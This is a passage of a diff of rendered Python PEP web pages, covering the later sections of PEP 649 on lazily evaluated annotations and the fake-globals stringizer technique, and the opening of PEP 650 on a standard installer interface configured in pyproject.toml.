Second, this PEP requires that the existing +__annotations__ must be a “data descriptor”, +implementing all three actions: get, set, and delete. +__annotations__ must also have its own internal +storage it uses to cache a reference to the annotations dict:

+
    +
  • Class and module objects must +cache the annotations dict in their __dict__, using the key +__annotations__. This is required for backwards +compatibility reasons.
  • +
  • For function objects, storage for the annotations dict +cache is an implementation detail. It’s preferably internal +to the function object and not visible in Python.
  • +
+

This PEP defines semantics on how __annotations__ and +__annotate__ interact, for all three types that implement them. +In the following examples, fn represents a function, cls +represents a class, mod represents a module, and o represents +an object of any of these three types:

+
    +
  • When o.__annotations__ is evaluated, and the internal storage +for o.__annotations__ is unset, and o.__annotate__ is set +to a callable, the getter for o.__annotations__ calls +o.__annotate__(1), then caches the result in its internal +storage and returns the result.
      +
    • To explicitly clarify one question that has come up multiple times: +this o.__annotations__ cache is the only caching mechanism +defined in this PEP. There are no other caching mechanisms defined +in this PEP. The __annotate__ functions generated by the Python +compiler explicitly don’t cache any of the values they compute.
    • +
    +
  • +
  • Setting o.__annotate__ to a callable invalidates the +cached annotations dict.
  • +
  • Setting o.__annotate__ to None has no effect on +the cached annotations dict.
  • +
  • Deleting o.__annotate__ raises TypeError. +__annotate__ must always be set; this prevents unannotated +subclasses from inheriting the __annotate__ method of one +of their base classes.
  • +
  • Setting o.__annotations__ to a legal value +automatically sets o.__annotate__ to None.
      +
    • Setting cls.__annotations__ or mod.__annotations__ +to None otherwise works like any other attribute; the +attribute is set to None.
    • +
    • Setting fn.__annotations__ to None invalidates +the cached annotations dict. If fn.__annotations__ +doesn’t have a cached annotations value, and fn.__annotate__ +is None, the fn.__annotations__ data descriptor +creates, caches, and returns a new empty dict. (This is for +backwards compatibility with PEP 3107 semantics.)
    • +
    +
  • +
+
+
+

Changes to allowable annotations syntax

+

__annotate__ now delays the evaluation of annotations until +__annotations__ is referenced in the future. It also means +annotations are evaluated in a new function, rather than in the +original context where the object they were defined on was bound. +There are four operators with significant runtime side-effects +that were permitted in stock semantics, but are disallowed when +from __future__ import annotations is active, and will have +to be disallowed when this PEP is active:

+
    +
  • :=
  • +
  • yield
  • +
  • yield from
  • +
  • await
  • +
+
+
+

Changes to inspect.get_annotations and typing.get_type_hints

+

(This PEP makes frequent reference to these two functions. In the future +it will refer to them collectively as “the helper functions”, as they help +user code work with annotations.)

+

These two functions extract and return the annotations from an object. +inspect.get_annotations returns the annotations unchanged; +for the convenience of static typing users, typing.get_type_hints +makes some modifications to the annotations before it returns them.

+

This PEP adds a new keyword-only parameter to these two functions, +format. format specifies what format the values in the +annotations dict should be returned in. +The format parameter on these two functions accepts the same values +as the format parameter on the __annotate__ magic method +defined above; however, these format parameters also have a default +value of inspect.VALUE.

+

When either __annotations__ or __annotate__ is updated on an +object, the other of those two attributes is now out-of-date and should also +either be updated or deleted (set to None, in the case of __annotate__ +which cannot be deleted). In general, the semantics established in the previous +section ensure that this happens automatically. However, there’s one case which +for all practical purposes can’t be handled automatically: when the dict cached +by o.__annotations__ is itself modified, or when mutable values inside that +dict are modified.

+

Since this can’t be handled in code, it must be handled in +documentation. This PEP proposes amending the documentation +for inspect.get_annotations (and similarly for +typing.get_type_hints) as follows:

+
+
If you directly modify the __annotations__ dict on an object, +by default these changes may not be reflected in the dictionary +returned by inspect.get_annotations when requesting either +SOURCE or FORWARDREF format on that object. Rather than +modifying the __annotations__ dict directly, consider replacing +that object’s __annotate__ method with a function computing +the annotations dict with your desired values. Failing that, it’s +best to overwrite the object’s __annotate__ method with None +to prevent inspect.get_annotations from generating stale results +for SOURCE and FORWARDREF formats.
+
+
+

The stringizer and the fake globals environment

+

As originally proposed, this PEP supported many runtime +annotation user use cases, and many static type user use cases. +But this was insufficient–this PEP could not be accepted +until it satisfied all extant use cases. This became +a longtime blocker of this PEP until Carl Meyer proposed +the “stringizer” and the “fake globals” environment as +described below. These techniques allow this PEP to support +both the FORWARDREF and SOURCE formats, ably +satisfying all remaining uses cases.

+

In a nutshell, this technique involves running a +Python-compiler-generated __annotate__ function in +an exotic runtime environment. Its normal globals +dict is replaced with what’s called a “fake globals” dict. +A “fake globals” dict is a dict with one important difference: +every time you “get” a key from it that isn’t mapped, +it creates, caches, and returns a new value for that key +(as per the __missing__ callback for a dictionary). +That value is a an instance of a novel type referred to +as a “stringizer”.

+

A “stringizer” is a Python class with highly unusual behavior. +Every stringizer is initialized with its “value”, initially +the name of the missing key in the “fake globals” dict. The +stringizer then implements every Python “dunder” method used to +implement operators, and the value returned by that method +is a new stringizer whose value is a text representation +of that operation.

+

When these stringizers are used in expressions, the result +of the expression is a new stringizer whose name textually +represents that expression. For example, let’s say +you have a variable f, which is a reference to a +stringizer initialized with the value 'f'. Here are +some examples of operations you could perform on f and +the values they would return:

+
>>> f
+Stringizer('f')
+>>> f + 3
+Stringizer('f + 3')
+>> f["key"]
+Stringizer('f["key"]')
+
+
+

Bringing it all together: if we run a Python-generated +__annotate__ function, but we replace its globals +with a “fake globals” dict, all undefined symbols it +references will be replaced with stringizer proxy objects +representing those symbols, and any operations performed +on those proxies will in turn result in proxies +representing that expression. This allows __annotate__ +to complete, and to return an annotations dict, with +stringizer instances standing in for names and entire +expressions that could not have otherwise been evaluated.

+

In practice, the “stringizer” functionality will be implemented +in the ForwardRef object currently defined in the +typing module. ForwardRef will be extended to +implement all stringizer functionality; it will also be +extended to support evaluating the string it contains, +to produce the real value (assuming all symbols referenced +are defined). This means the ForwardRef object +will retain references to the appropriate “globals”, +“locals”, and even “closure” information needed to +evaluate the expression.

+

This technique is the core of how inspect.get_annotations +supports FORWARDREF and SOURCE formats. Initially, +inspect.get_annotations will call the object’s +__annotate__ method requesting the desired format. +If that raises NotImplementedError, inspect.get_annotations +will construct a “fake globals” environment, then call +the object’s __annotate__ method.

+
    +
  • inspect.get_annotations produces SOURCE format +by creating a new empty “fake globals” dict, binding it +to the object’s __annotate__ method, calling that +requesting VALUE format, and then extracting the string +“value” from each ForwardRef object +in the resulting dict.
  • +
  • inspect.get_annotations produces FORWARDREF format +by creating a new empty “fake globals” dict, pre-populating +it with the current contents of the __annotate__ method’s +globals dict, binding the “fake globals” dict to the object’s +__annotate__ method, calling that requesting VALUE +format, and returning the result.
  • +
+

This entire technique works because the __annotate__ functions +generated by the compiler are controlled by Python itself, and +are simple and predictable. They’re +effectively a single return statement, computing and +returning the annotations dict. Since most operations needed +to compute an annotation are implemented in Python using dunder +methods, and the stringizer supports all the relevant dunder +methods, this approach is a reliable, practical solution.

+

However, it’s not reasonable to attempt this technique with +just any __annotate__ method. This PEP assumes that +third-party libraries may implement their own __annotate__ +methods, and those functions would almost certainly work +incorrectly when run in this “fake globals” environment. +For that reason, this PEP allocates a flag on code objects, +one of the unused bits in co_flags, to mean “This code +object can be run in a ‘fake globals’ environment.” This +makes the “fake globals” environment strictly opt-in, and +it’s expected that only __annotate__ methods generated +by the Python compiler will set it.

+

The weakness in this technique is in handling operators which +don’t directly map to dunder methods on an object. These are +all operators that implement some manner of flow control, +either branching or iteration:

+
    +
  • Short-circuiting or
  • +
  • Short-circuiting and
  • +
  • Ternary operator (the if / then operator)
  • +
  • Generator expressions
  • +
  • List / dict / set comprehensions
  • +
  • Iterable unpacking
  • +
+

As a rule these techniques aren’t used in annotations, +so it doesn’t pose a problem in practice. However, the +recent addition of TypeVarTuple to Python does use +iterable unpacking. The dunder methods +involved (__iter__ and __next__) don’t permit +distinguishing between iteration use cases; in order to +correctly detect which use case was involved, mere +“fake globals” and a “stringizer” wouldn’t be sufficient; +this would require a custom bytecode interpreter designed +specifically around producing SOURCE and FORWARDREF +formats.

+

Thankfully there’s a shortcut that will work fine: +the stringizer will simply assume that when its +iteration dunder methods are called, it’s in service +of iterator unpacking being performed by TypeVarTuple. +It will hard-code this behavior. This means no other +technique using iteration will work, but in practice +this won’t inconvenience real-world use cases.

+

Finally, note that the “fake globals” environment +will also require constructing a matching “fake locals” +dictionary, which for FORWARDREF format will be +pre-populated with the relevant locals dict. The +“fake globals” environment will also have to create +a fake “closure”, a tuple of ForwardRef objects +pre-created with the names of the free variables +referenced by the __annotate__ method.

+

ForwardRef proxies created from __annotate__ +methods that reference free variables will map the +names and closure values of those free variables into +the locals dictionary, to ensure that eval uses +the correct values for those names.

+
+
+

Compiler-generated __annotate__ functions

+

As mentioned in the previous section, the __annotate__ +functions generated by the compiler are simple. They’re +mainly a single return statement, computing and +returning the annotations dict.

+

However, the protocol for inspect.get_annotations +to request either FORWARDREF or SOURCE format +requires first asking the __annotate__ method to +produce it. __annotate__ methods generated by +the Python compiler won’t support either of these +formats and will raise NotImplementedError().

+
+
+

Third-party __annotate__ functions

+

Third-party classes and functions will likely need +to implement their own __annotate__ methods, +so that downstream users of +those objects can take full advantage of annotations. +In particular, wrappers will likely need to transform +the annotation dicts produced by the wrapped object: adding, +removing, or modifying the dictionary in some way.

+

Most of the time, third-party code will implement +their __annotate__ methods by calling +inspect.get_annotations on some existing upstream +object. For example, wrappers will likely request the +annotations dict for their wrapped object, +in the format that was requested from them, then +modify the returned annotations dict as appropriate +and return that. This allows third-party code to +leverage the “fake globals” technique without +having to understand or participate in it.

+

Third-party libraries that support both pre- and +post-PEP-649 versions of Python will have to innovate +their own best practices on how to support both. +One sensible approach would be for their wrapper to +always support __annotate__, then call it requesting +VALUE format and store the result as the +__annotations__ on their wrapper object. +This would support pre-649 Python semantics, and be +forward-compatible with post-649 semantics.

+
+
+

Pseudocode

+

Here’s high-level pseudocode for inspect.get_annotations:

+
def get_annotations(o, format):
+    if format == VALUE:
+        return dict(o.__annotations__)
+
+    if format == FORWARDREF:
+        try:
+            return dict(o.__annotations__)
+        except NameError:
+            pass
+
+    if not hasattr(o.__annotate__):
+        return {}
+
+    c_a = o.__annotate__
+    try:
+        return c_a(format)
+    except NotImplementedError:
+        if not can_be_called_with_fake_globals(c_a):
+            return {}
+        c_a_with_fake_globals = make_fake_globals_version(c_a, format)
+        return c_a_with_fake_globals(VALUE)
+
+
+

Here’s what a Python compiler-generated __annotate__ method +might look like if it was written in Python:

+
def __annotate__(self, format):
+    if format != 1:
+        raise NotImplementedError()
+    return { ... }
+
+
+

Here’s how a third-party wrapper class might implement +__annotate__. In this example, the wrapper works +like functools.partial, pre-binding one parameter of +the wrapped callable, which for simplicity must be named +arg:

+
def __annotate__(self, format):
+    ann = inspect.get_annotations(self.wrapped_fn, format)
+    if 'arg' in ann:
+        del ann['arg']
+    return ann
+
+
+
+
+

Other modifications to the Python runtime

+

This PEP does not dictate exactly how it should be +implemented; that is left up to the language implementation +maintainers. However, the best implementation of this +PEP may require adding additional information to existing +Python objects, which is implicitly condoned by the acceptance +of this PEP.

+

For example, it may be necessary to add a +__globals__ attribute to class objects, so that the +__annotate__ function for that class can be lazily +bound, only on demand. Also, __annotate__ functions +defined on methods defined in a class may need to retain +a reference to the class’s __dict__, in order to +correctly evaluate names bound in that class. It’s expected +that the CPython implementation of this PEP will include +both those new attributes.

+

All such new information added to existing Python objects +should be done with “dunder” attributes, as they will of +course be implementation details.

+
+
+

Interactive REPL Shell

+

The semantics established in this PEP also hold true when executing +code in Python’s interactive REPL shell, except for module annotations +in the interactive module (__main__) itself. Since that module is +never “finished”, there’s no specific point where we can compile the +__annotate__ function.

+

For the sake of simplicity, in this case we forego delayed evaluation. +Module-level annotations in the REPL shell will continue to work +exactly as they do with “stock semantics”, evaluating immediately and +setting the result directly inside the __annotations__ dict.

+
+
+

Annotations On Local Variables Inside Functions

+

Python supports syntax for local variable annotations inside +functions. However, these annotations have no runtime +effect–they’re discarded at compile-time. Therefore, this +PEP doesn’t need to do anything to support them, the same +as stock semantics and PEP 563.

+
+
+

Prototype

+

The original prototype implementation of this PEP can be found here:

+

https://github.com/larryhastings/co_annotations/

+

As of this writing, the implementation is severely out of date; +it’s based on Python 3.10 and implements the semantics of the +first draft of this PEP, from early 2021. It will be updated +shortly.

+
+
+

Performance Comparison

+

Performance with this PEP is generally favorable. There are four +scenarios to consider:

+
    +
  • the runtime cost when annotations aren’t defined,
  • +
  • the runtime cost when annotations are defined but not referenced, and
  • +
  • the runtime cost when annotations are defined and referenced as objects.
  • +
  • the runtime cost when annotations are defined and referenced as strings.
  • +
+

We’ll examine each of these scenarios in the context of all three +semantics for annotations: stock, PEP 563, and this PEP.

+

When there are no annotations, all three semantics have the same +runtime cost: zero. No annotations dict is created and no code is +generated for it. This requires no runtime processor time and +consumes no memory.

+

When annotations are defined but not referenced, the runtime cost +of Python with this PEP is roughly the same as PEP 563, and +improved over stock. The specifics depend on the object +being annotated:

+
    +
  • With stock semantics, the annotations dict is always built, and +set as an attribute of the object being annotated.
  • +
  • In PEP 563 semantics, for function objects, a precompiled +constant (a specially constructed tuple) is set as an attribute +of the function. For class and module objects, the annotations +dict is always built and set as an attribute of the class or module.
  • +
  • With this PEP, a single object is set as an attribute of the +object being annotated. Most of the time, this object is +a constant (a code object), but when the annotations require a +class namespace or closure, this object will be a tuple constructed +at binding time.
  • +
+

When annotations are both defined and referenced as objects, code using +this PEP should be much faster than PEP 563, and be as fast +or faster than stock. PEP 563 semantics requires invoking +eval() for every value inside an annotations dict which is +enormously slow. And the implementation of this PEP generates measurably +more efficient bytecode for class and module annotations than stock +semantics; for function annotations, this PEP and stock semantics +should be about the same speed.

+

The one case where this PEP will be noticeably slower than PEP 563 is when +annotations are requested as strings; it’s hard to beat “they are already +strings.” But stringified annotations are intended for online documentation use +cases, where performance is less likely to be a key factor.

+

Memory use should also be comparable in all three scenarios across +all three semantic contexts. In the first and third scenarios, +memory usage should be roughly equivalent in all cases. +In the second scenario, when annotations are defined but not +referenced, using this PEP’s semantics will mean the +function/class/module will store one unused code object (possibly +bound to an unused function object); with the other two semantics, +they’ll store one unused dictionary or constant tuple.

+
+
+
+

Backwards Compatibility

+
+

Backwards Compatibility With Stock Semantics

+

This PEP preserves nearly all existing behavior of +annotations from stock semantics:

+
    +
  • The format of the annotations dict stored in +the __annotations__ attribute is unchanged. +Annotations dicts contain real values, not strings +as per PEP 563.
  • +
  • Annotations dicts are mutable, and any changes to them are +preserved.
  • +
  • The __annotations__ attribute can be explicitly set, +and any legal value set this way will be preserved.
  • +
  • The __annotations__ attribute can be deleted using +the del statement.
  • +
+

Most code that works with stock semantics should +continue to work when this PEP is active without any +modification necessary. But there are exceptions, +as follows.

+

First, there’s a well-known idiom for accessing class +annotations which may not work correctly when this +PEP is active. The original implementation of class +annotations had what can only be called a bug: if a class +didn’t define any annotations of its own, but one +of its base classes did define annotations, the class +would “inherit” those annotations. This behavior +was never desirable, so user code found a workaround: +instead of accessing the annotations on the class +directly via cls.__annotations__, code would +access the class’s annotations via its dict as in +cls.__dict__.get("__annotations__", {}). This +idiom worked because classes stored their annotations +in their __dict__, and accessing them this way +avoided the lookups in the base classes. The technique +relied on implementation details of CPython, so it +was never supported behavior–though it was necessary. +However, when this PEP is active, a class may have +annotations defined but hasn’t yet called __annotate__ +and cached the result, in which case this approach +would lead to mistakenly assuming the class didn’t have +annotations. +In any case, the bug was fixed as of Python 3.10, and the +idiom should no longer be used. Also as of Python 3.10, +there’s an +Annotations HOWTO +that defines best practices +for working with annotations; code that follows these +guidelines will work correctly even when this PEP is +active, because it suggests using different approaches +to get annotations from class objects based on the +Python version the code runs under.

+

Since delaying the evaluation of annotations until they are +introspected changes the semantics of the language, it’s observable +from within the language. Therefore it’s possible to write code +that behaves differently based on whether annotations are +evaluated at binding time or at access time, e.g.

+
mytype = str
+def foo(a:mytype): pass
+mytype = int
+print(foo.__annotations__['a'])
+
+
+

This will print <class 'str'> with stock semantics +and <class 'int'> when this PEP is active. This is +therefore a backwards-incompatible change. However, this +example is poor programming style, so this change seems +acceptable.

+

There are two uncommon interactions possible with class +and module annotations that work with stock semantics +that would no longer work when this PEP was active. +These two interactions would have to be prohibited. The +good news is, neither is common, and neither is considered +good practice. In fact, they’re rarely seen outside of +Python’s own regression test suite. They are:

+
    +
  • Code that sets annotations on module or class attributes +from inside any kind of flow control statement. It’s +currently possible to set module and class attributes with +annotations inside an if or try statement, and it works +as one would expect. It’s untenable to support this behavior +when this PEP is active.
  • +
  • Code in module or class scope that references or modifies the +local __annotations__ dict directly. Currently, when +setting annotations on module or class attributes, the generated +code simply creates a local __annotations__ dict, then adds +mappings to it as needed. It’s possible for user code +to directly modify this dict, though this doesn’t seem to be +an intentional feature. Although it would be possible to support +this after a fashion once this PEP was active, the semantics +would likely be surprising and wouldn’t make anyone happy.
  • +
+

Note that these are both also pain points for static type checkers, +and are unsupported by those tools. It seems reasonable to +declare that both are at the very least unsupported, and their +use results in undefined behavior. It might be worth making a +small effort to explicitly prohibit them with compile-time checks.

+

Finally, if this PEP is active, annotation values shouldn’t use +the if / else ternary operator. Although this will work +correctly when accessing o.__annotations__ or requesting +inspect.VALUE from a helper function, the boolean expression +may not compute correctly with inspect.FORWARDREF when +some names are defined, and would be far less correct with +inspect.SOURCE.

+
+
+

Backwards Compatibility With PEP 563 Semantics

+

PEP 563 changed the semantics of annotations. When its semantics +are active, annotations must assume they will be evaluated in +module-level or class-level scope. They may no longer refer directly +to local variables in the current function or an enclosing function. +This PEP removes that restriction, and annotations may refer any +local variable.

+

PEP 563 requires using eval (or a helper function like +typing.get_type_hints or inspect.get_annotations that +uses eval for you) to convert stringized annotations into +their “real” values. Existing code that activates stringized +annotations, and calls eval() directly to convert the strings +back into real values, can simply remove the eval() call. +Existing code using a helper function would continue to work +unchanged, though use of those functions may become optional.

+

Static typing users often have modules that only contain +inert type hint definitions–but no live code. These modules +are only needed when running static type checking; they aren’t +used at runtime. But under stock semantics, these modules +have to be imported in order for the runtime to evaluate and +compute the annotations. Meanwhile, these modules often +caused circular import problems that could be difficult or +even impossible to solve. PEP 563 allowed users to solve +these circular import problems by doing two things. First, +they activated PEP 563 in their modules, which meant annotations +were constant strings, and didn’t require the real symbols to +be defined in order for the annotations to be computable. +Second, this permitted users to only import the problematic +modules in an if typing.TYPE_CHECKING block. This allowed +the static type checkers to import the modules and the type +definitions inside, but they wouldn’t be imported at runtime. +So far, this approach will work unchanged when this PEP is +active; if typing.TYPE_CHECKING is supported behavior.

+

However, some codebases actually did examine their +annotations at runtime, even when using the if typing.TYPE_CHECKING +technique and not importing definitions used in their annotations. +These codebases examined the annotation strings without +evaluating them, instead relying on identity checks or +simple lexical analysis on the strings.

+

This PEP supports these techniques too. But users will need +to port their code to it. First, user code will need to use +inspect.get_annotations or typing.get_type_hints to +access the annotations; they won’t be able to simply get the +__annotations__ attribute from their object. Second, +they will need to specify either inspect.FORWARDREF +or inspect.SOURCE for the format when calling that +function. This means the helper function can succeed in +producing the annotations dict, even when not all the symbols +are defined. Code expecting stringized annotations should +work unmodified with inspect.SOURCE formatted annotations +dicts; however, users should consider switching to +inspect.FORWARDREF, as it may make their analysis easier.

+

Similarly, PEP 563 permitted use of class decorators on +annotated classes in a way that hadn’t previously been possible. +Some class decorators (e.g. dataclasses) examine the annotations +on the class. Because class decorators using the @ decorator +syntax are run before the class name is bound, they can cause +unsolvable circular-definition problems. If you annotate attributes +of a class with references to the class itself, or annotate attributes +in multiple classes with circular references to each other, you +can’t decorate those classes with the @ decorator syntax +using decorators that examine the annotations. PEP 563 allowed +this to work, as long as the decorators examined the strings lexically +and didn’t use eval to evaluate them (or handled the NameError +with further workarounds). When this PEP is active, decorators will +be able to compute the annotations dict in inspect.SOURCE or +inspect.FORWARDREF format using the helper functions. This +will permit them to analyze annotations containing undefined +symbols, in the format they prefer.

+

Early adopters of PEP 563 discovered that “stringized” +annotations were useful for automatically-generated documentation. +Users experimented with this use case, and Python’s pydoc +has expressed some interest in this technique. This PEP supports +this use case; the code generating the documentation will have to be +updated to use a helper function to access the annotations in +inspect.SOURCE format.

+

Finally, the warnings about using the if / else ternary +operator in annotations apply equally to users of PEP 563. +It currently works for them, but could produce incorrect +results when requesting some formats from the helper functions.

+

If this PEP is accepted, PEP 563 will be deprecated and +eventually removed. To facilitate this transition for early +adopters of PEP 563, who now depend on its semantics, +inspect.get_annotations and typing.get_type_hints will +implement a special affordance.

+

The Python compiler won’t generate annotation code objects +for objects defined in a module where PEP 563 semantics are +active, even if this PEP is accepted. So, under normal +circumstances, requesting inspect.SOURCE format from a +helper function would return an empty dict. As an affordance, +to facilitate the transition, if the helper functions detect +that an object was defined in a module with PEP 563 active, +and the user requests inspect.SOURCE format, they’ll return +the current value of the __annotations__ dict, which in +this case will be the stringized annotations. This will allow +PEP 563 users who lexically analyze stringized annotations +to immediately change over to requesting inspect.SOURCE format +from the helper functions, which will hopefully smooth their +transition away from PEP 563.

+
+
+
+

Rejected Ideas

+
+

“Just store the strings”

+

One proposed idea for supporting SOURCE format was for +the Python compiler to emit the actual source code for the +annotation values somewhere, and to furnish that when +the user requested SOURCE format.

+

This idea wasn’t rejected so much as categorized as +“not yet”. We already know we need to support FORWARDREF +format, and that technique can be adapted to support +SOURCE format in just a few lines. There are many +unanswered questions about this approach:

+
    +
  • Where would we store the strings? Would they always +be loaded when the annotated object was created, or +would they be lazy-loaded on demand? If so, how +would the lazy-loading work?
  • +
  • Would the “source code” include the newlines and +comments of the original? Would it preserve all +whitespace, including indents and extra spaces used +purely for formatting?
  • +
+

It’s possible we’ll revisit this topic in the future, +if improving the fidelity of SOURCE values to the +original source code is judged sufficiently important.

+
+
+
+

Acknowledgements

+

Thanks to Carl Meyer, Barry Warsaw, Eric V. Smith, +Mark Shannon, Jelle Ziljstra, and Guido van Rossum for ongoing +feedback and encouragement.

+

Particular thanks to several individuals who contributed key ideas +that became some of the best aspects of this proposal:

+
    +
  • Carl Meyer suggested the “stringizer” technique that made +FORWARDREF and SOURCE formats possible, which +allowed making forward progress on this PEP possible after +a year of languishing due to seemingly-unfixable problems. +He also suggested the affordance for PEP 563 users where +inspect.SOURCE will return the stringized annotations, +and many more suggestions besides. Carl was also the primary +correspondent in private email threads discussing this PEP, +and was a tireless resource and voice of sanity. This PEP +would almost certainly not have been accepted it were it not +for Carl’s contributions.
  • +
  • Mark Shannon suggested building the entire annotations dict +inside a single code object, and only binding it to a function +on demand.
  • +
  • Guido van Rossum suggested that __annotate__ +functions should duplicate the name visibility rules of +annotations under “stock” semantics.
  • +
  • Jelle Zijlstra contributed not only feedback–but code!
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0649.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0650/index.html b/pep-0650/index.html new file mode 100644 index 00000000000..435ae0baa9a --- /dev/null +++ b/pep-0650/index.html @@ -0,0 +1,807 @@ + + + + + + + + PEP 650 – Specifying Installer Requirements for Python Projects | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 650 – Specifying Installer Requirements for Python Projects

+
+
Author:
+
Vikram Jayanthi <vikramjayanthi at google.com>, +Dustin Ingram <di at python.org>, +Brett Cannon <brett at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
16-Jul-2020
+
Post-History:
+
14-Jan-2021
+
+
+
+
Table of Contents +
+
+

Abstract

+

Python package installers are not completely interoperable with each +other. While pip is the most widely used installer and a de facto +standard, other installers such as Poetry or Pipenv are popular as +well due to offering unique features which are optimal for certain +workflows and not directly in line with how pip operates.

+

While the abundance of installer options is good for end-users with +specific needs, the lack of interoperability between them makes it +hard to support all potential installers. Specifically, the lack of a +standard requirements file for declaring dependencies means that each +tool must be explicitly used in order to install dependencies +specified with their respective format. Otherwise tools must emit a +requirements file which leads to potential information loss for the +installer as well as an added export step as part of a developer’s +workflow.

+

By providing a standardized API that can be used to invoke a +compatible installer, we can solve this problem without needing to +resolve individual concerns, unique requirements, and +incompatibilities between different installers and their lock files.

+

Installers that implement the specification can be invoked in a +uniform way, allowing users to use their installer of choice as if +they were invoking it directly.

+
+
+

Terminology

+
+
Installer interface
The interface by which an installer backend and a +universal installer interact.
+
Universal installer
An installer that can invoke an installer backend by calling the +optional invocation methods of the installer interface. This can +also be thought of as the installer frontend, à la the build +project for PEP 517.
+
Installer backend
An installer that implements the installer interface, allowing +it to be invoked by a universal installer. An +installer backend may also be a universal installer as well, +but it is not required. In comparison to PEP 517, this would +be Flit. Installer backends may be wrapper packages around +a backing installer, e.g. Poetry could choose to not support this +API, but a package could act as a wrapper to invoke Poetry as +appropriate to use Poetry to perform an installation.
+
Dependency group
A set of dependencies that are related and required to be +installed simultaneously for some purpose. For example, a +“test” dependency group could include the dependencies required to +run the test suite. How dependency groups are specified is up to +the installer backend.
+
+
+
+

Motivation

+

This specification allows anyone to invoke and interact with +installer backends that implement the specified interface, allowing +for a universally supported layer on top of existing tool-specific +installation processes.

+

This in turn would enable the use of all installers that implement the +specified interface to be used in environments that support a single +universal installer, as long as that installer implements this +specification as well.

+

Below, we identify various use-cases applicable to stakeholders in the +Python community and anyone who interacts with Python package +installers. For developers or companies, this PEP would allow for +increased functionality and flexibility with Python package +installers.

+
+

Providers

+

Providers are the parties (organization, person, community, etc.) that +supply a service or software tool which interacts with Python +packaging and consequently Python package installers. Two different +types of providers are considered:

+
+

Platform/Infrastructure Providers

+

Platform providers (cloud environments, application hosting, etc.) and +infrastructure service providers need to support package installers +for their users to install Python dependencies. Most only support pip, +however there is user demand for other Python installers. Most +providers do not want to maintain support for more than one installer +because of the complexity it adds to their software or service and the +resources it takes to do so.

+

Via this specification, we can enable a provider-supported +universal installer to invoke the user-desired installer backend +without the provider’s platform needing to have specific knowledge of +said backend. What this means is if Poetry implemented the installer +backend API proposed by this PEP (or some other package wrapped Poetry +to provide the API), then platform providers would support Poetry +implicitly.

+
+
+

IDE Providers

+

Integrated development environments may interact with Python package +installation and management. Most only support pip as a Python package +installer, and users are required to find work arounds to install +their dependencies using other package installers. Similar to the +situation with PaaS & IaaS providers, IDE providers do not want to +maintain support for N different Python installers. Instead, +implementers of the installer interface (installer backends) could +be invoked by the IDE by it acting as a universal installer.

+
+
+
+

Developers

+

Developers are teams, people, or communities that code and use Python +package installers and Python packages. Three different types of +developers are considered:

+
+

Developers using PaaS & IaaS providers

+

Most PaaS and IaaS providers only support one Python package +installer: pip. (Some exceptions include Heroku’s Python buildpack, +which supports pip and Pipenv). This dictates the installers that +developers can use while working with these providers, which might not +be optimal for their application or workflow.

+

Installers adopting this PEP to become installer backends would allow +users to use third party platforms/infrastructure without having to +worry about which Python package installer they are required to use as +long as the provider uses a universal installer.

+
+
+

Developers using IDEs

+

Most IDEs only support pip or a few Python package installers. +Consequently, developers must use workarounds or hacky methods to +install their dependencies if they use an unsupported package +installer.

+

If the IDE uses/provides a universal installer it would allow for +any installer backend that the developer wanted to be used to +install dependencies, freeing them of any extra work to install their +dependencies in order to integrate into the IDE’s workflow more +closely.

+
+
+

Developers working with other developers

+

Developers want to be able to use the installer of their choice while +working with other developers, but currently have to synchronize their +installer choice for compatibility of dependency installation. If all +preferred installers instead implemented the specified interface, it +would allow for cross use of installers, allowing developers to choose +an installer regardless of their collaborator’s preference.

+
+
+
+

Upgraders & Package Infrastructure Providers

+

Package upgraders and package infrastructure in CI/CD such as +Dependabot, PyUP, etc. currently support a few installers. They work +by parsing and editing the installer-specific dependency files +directly (such as requirements.txt or poetry.lock) with +relevant package information such as upgrades, downgrades, or new +hashes. Similar to Platform and IDE providers, most of these providers +do not want to support N different Python package installers as that +would require supporting N different file types.

+

Currently, these services/bots have to implement support for each +package installer individually. Inevitably, the most popular +installers are supported first, and less popular tools are often never +supported. By implementing this specification, these services/bots can +support any (compliant) installer, allowing users to select the tool +of their choice. This will allow for more innovation in the space, as +platforms and IDEs are no longer forced to prematurely select a +“winner”.

+
+
+

Open Source Community

+

Specifying installer requirements and adopting this PEP will reduce +the friction between Python package installers and people’s workflows. +Consequently, it will reduce the friction between Python package +installers and 3rd party infrastructure/technologies such as PaaS or +IDEs. Overall, it will allow for easier development, deployment and +maintenance of Python projects as Python package installation becomes +simpler and more interoperable.

+

Specifying requirements and creating an interface for installers can +also increase the pace of innovation around installers. This would +allow for installers to experiment and add unique functionality +without requiring the rest of the ecosystem to do the same. Support +becomes easier and more likely for a new installer regardless of the +functionality it adds and the format in which it writes dependencies, +while reducing the developer time and resources needed to do so.

+
+
+
+

Specification

+

Similar to how PEP 517 specifies build systems, the install system +information will live in the pyproject.toml file under the +install-system table.

+
+

[install-system]

+

The install-system table is used to store install-system relevant data +and information. There are multiple required keys for this table: +requires and install-backend. The requires key holds the +minimum requirements for the installer backend to execute and which +will be installed by the universal installer. The install-backend +key holds the name of the install backend’s entry point. This will +allow the universal installer to install the requirements for the +installer backend itself to execute (not the requirements that the +installer backend itself will install) as well as invoke the +installer backend.

+

If either of the required keys are missing or empty then the +universal installer SHOULD raise an error.

+

All package names interacting with this interface are assumed to +follow PEP 508’s “Dependency specification for Python Software +Packages” format.

+

An example install-system table:

+
#pyproject.toml
+[install-system]
+#Eg : pipenv
+requires = ["pipenv"]
+install-backend = "pipenv.api:main"
+
+
+
+

Installer Requirements:

+

The requirements specified by the requires key must be within the +constraints specified by PEP 517. Specifically, that dependency +cycles are not permitted and the universal installer SHOULD refuse +to install the dependencies if a cycle is detected.

+
+
+

Additional parameters or tool specific data

+

Additional parameters or tool (installer backend) data may also be +stored in the pyproject.toml file. This would be in the “tool.*” +table as specified by PEP 518. For example, if the +installer backend is Poetry and you wanted to specify multiple +dependency groups, the tool.poetry tables could look like this:

+
[tool.poetry.dev-dependencies]
+dependencies = "dev"
+
+[tool.poetry.deploy]
+dependencies = "deploy"
+
+
+

